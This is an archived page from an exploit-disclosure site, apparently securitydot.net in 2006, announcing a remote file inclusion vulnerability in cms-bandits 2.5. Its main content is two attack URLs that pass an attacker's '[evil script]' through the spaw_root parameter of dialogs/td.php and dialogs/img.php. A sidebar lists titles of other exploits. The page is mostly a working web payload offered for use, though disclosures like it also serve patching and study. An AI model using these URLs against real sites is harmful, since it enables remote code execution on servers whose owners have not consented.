exploits , vulnerabilities , articles , cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities

2006-06-08

cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities

Rated as : High Risk

# Author:     Federico Fazzi
# Contact:    federico@autistici.org
# Date:       08/06/2006, 11:09
# Sinthesis:  cms-bandits 2.5, Remote file disclosure
# Product:    http://sourceforge.net/projects/cms-bandits

http://[site]/[cms-bandits]/dialogs/td.php?spaw_root=[evil script]
http://[site]/[cms-bandits]/dialogs/img.php?spaw_root=[evil script]
securitydot.net - 2006-06-08

Exploits - newest 10 RSS | More

2007-06-15 57290 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34214 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42436 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29337 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19777 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16711 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19409 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16596 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33611 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17237 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit